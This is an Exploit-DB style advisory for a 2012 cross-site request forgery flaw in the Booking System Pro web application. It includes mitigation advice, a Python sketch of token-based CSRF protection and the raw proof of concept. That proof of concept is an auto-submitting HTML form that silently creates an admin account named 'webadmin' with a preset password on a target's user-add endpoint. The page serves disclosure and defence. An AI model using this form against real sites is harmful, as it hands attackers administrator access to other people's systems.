Vendor: Booking System Pro
By: DaOne
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery (CSRF))
Product Name: Booking System Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Booking System Pro CSRF Vulnerability

This exploit allows an attacker to add an admin user to the Booking System Pro application. The attacker crafts a malicious HTML page containing a form whose hidden fields hold the new admin's credentials and role, pointed at the admin user-creation endpoint. When a victim who is logged in to the admin interface visits the page, the form is submitted automatically with the victim's session cookie; because the endpoint accepts the request without any anti-CSRF token, the admin user is added to the application.

Mitigation:

Implementing CSRF protection tokens, validating the HTTP Referer header, and using CAPTCHA can help mitigate CSRF attacks.
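As an added illustration (not the vendor's code, which the page does not show), a stdlib Python model of the guard the mitigation describes: a per-session synchronizer token compared in constant time, with an Origin/Referer comparison as a secondary check, applied to a constructed replay of the advisory's auto-submitted form. The application origin, the token field name and the handler are assumptions made for this example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the application's own origin (constructed for this example).
APP_ORIGIN = "http://booking.example"
# Assumption: hidden form field name carrying the token (hypothetical).
TOKEN_FIELD = "data[_Token][key]"


def issue_csrf_token(session):
    """Mint a per-session synchronizer token; store it server-side and
    render it into the admin 'add user' form as a hidden field."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def origin_allowed(headers):
    """Defense in depth: a present Origin (or Referer) must match our site.
    Absent headers fall through to the token check, which is mandatory,
    so users whose browsers strip Referer are not locked out."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return True
    p = urlsplit(src)
    return f"{p.scheme}://{p.netloc}" == APP_ORIGIN


def csrf_check(session, headers, form):
    """True only if the POST carries the token tied to this session."""
    expected = session.get("csrf_token")
    supplied = form.get(TOKEN_FIELD)
    if not expected or not supplied:
        return False  # a cross-site page cannot read the victim's token
    if not hmac.compare_digest(expected, supplied):
        return False
    return origin_allowed(headers)


def handle_add_user(session, headers, form, users):
    """Guarded stand-in for POST /admin/users/add (not the vendor's code)."""
    if not csrf_check(session, headers, form):
        return 403
    users.append({"username": form["data[User][username]"],
                  "role": form["data[User][role]"]})
    return 201


# Constructed replay of the advisory's form: the victim's cookie makes the
# session valid, but the request has no token and a foreign Origin.
FORGED_FORM = {"data[User][username]": "webadmin", "data[User][role]": "admin"}
FORGED_HEADERS = {"Origin": "http://attacker.example"}
```

With the token check in place the replayed form is refused with 403, while the same fields submitted from the application's own page with its token are accepted.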

Exploit-DB raw data:

# Exploit Title: Booking System Pro CSRF Vulnerability
# Date: 28/08/2012
# Author: DaOne (@LibyanCA)
# Vendor: http://www.neptunescripts.com/products
# Price: $39

# CSRF Add Admin

<html>
<!-- Auto-submits the hidden form to the admin add-user endpoint on page load -->
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/users/add">
<input type="hidden" name="data[User][name]" value="webadmin"/>
<input type="hidden" name="data[User][username]" value="webadmin"/>
<input type="hidden" name="data[User][password]" value="pass123"/>
<input type="hidden" name="data[User][email]" value="admin@email.com"/>
<input type="hidden" name="data[User][phone]" value=""/>
<input type="hidden" name="data[User][role]" value="admin"/>
</form>
</body>
</html>